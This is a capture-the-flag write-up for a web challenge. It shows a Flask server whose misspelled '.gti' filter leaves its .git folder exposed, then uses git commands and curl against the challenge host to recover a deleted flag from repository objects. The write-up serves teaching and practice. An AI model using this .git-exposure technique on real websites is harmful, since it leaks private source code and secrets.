# Swedish State Archive
Category: Web

Points: 60

Description: The Swedish State Archive are working on their new site, but it's not quite finished yet...

We are given a link to a web page which is seemingly under construction. Looking into the source code we are able to find the reference to a certain `web_server.py`.

Looking into the file we are able to find the following code:
```python
from flask import Flask, request, escape
import os

app = Flask("")

@app.route("/")
def index():
    return get("index.html")

@app.route("/<path:path>")
def get(path):
    print("Getting", path)
    if ".." in path:
        return ""

    if "logs" in path or ".gti" in path:
        return "Please do not access the .git-folder"

    if "index" in path:
        path = "index.html"

    if os.path.isfile(path):
        return open(path, "rb").read()

    if os.path.isdir(path):
        return get("folder.html")

    return "404 not found"


if __name__ == "__main__":
    app.run("0.0.0.0", "8000")
```

Notice the misspelling in `.gti` which supposedly should spell `.git` to block requests to the git repository. Unfortunately we are unable to use `git` or [GitTools](https://github.com/internetwache/GitTools) to extract this repository since if we request the critical file `index` from the repository the web server returns the `index.html` file instead of the `.git/index` file.

Using the script [git_downloader.py](git_downloader.py) we are able to download some of the data from the server.

Now we are able to run some `git` commands on the repository:
```bash
$ git log
...
commit 3f758acc0f86b3e849db90e1b6efeddf506c6022
Author: Travis CI User <travis@example.org>
Date:   Sat Dec 14 07:28:33 2019 +0000

    Oops, flag.txt should not be in the repo.

commit ab4e6cc2bcfb3f9fbe4ee098ce3bffa9a7a6b80e
Author: Travis CI User <travis@example.org>
Date:   Sat Dec 14 07:28:33 2019 +0000

    did some work on flag.txt

commit 0d244f764db9257b18dd84f5830ff958e7b2571d
Author: Travis CI User <travis@example.org>
Date:   Sat Dec 14 07:28:33 2019 +0000

    Initial commit, add web_server.py, index.html and folder.html
```

The commit `ab4e6cc2bcfb3f9fbe4ee098ce3bffa9a7a6b80e` seems pretty interesting, let's look into it:
```bash
$ git cat-file -p ab4e6cc2bcfb3f9fbe4ee098ce3bffa9a7a6b80e
tree 326cb05f3fcbdf63aef0177fee81623ff4619398
parent 0d244f764db9257b18dd84f5830ff958e7b2571d
author Travis CI User <travis@example.org> 1576308513 +0000
committer Travis CI User <travis@example.org> 1576308513 +0000

did some work on flag.txt

# Let's look at the tree for this commit
$ git cat-file -p 326cb05f3fcbdf63aef0177fee81623ff4619398 
100644 blob ef460ecd090b93b133675a0560eb15ae5c7ef822    flag.txt
100644 blob 5636e6826bc590056664a831b699e00fc7fe09a5    folder.html
100644 blob 278e44e8dcfcd51d34a0e4125dd5762741ad30f2    index.html
100644 blob 87879464055e640e43f98c442b1de5c7355c9927    web_server.py
```

And there we found the blob ID for `flag.txt`. Let's `curl` this object from the server and pipe it to `pigz` to extract the flag:

```bash
$ curl -s http://13.53.175.227:50000/.git/objects/ef/460ecd090b93b133675a0560eb15ae5c7ef822 | pigz -d
blob 32watevr{everything_is_offentligt}
```

Flag: `watevr{everything_is_offentligt}`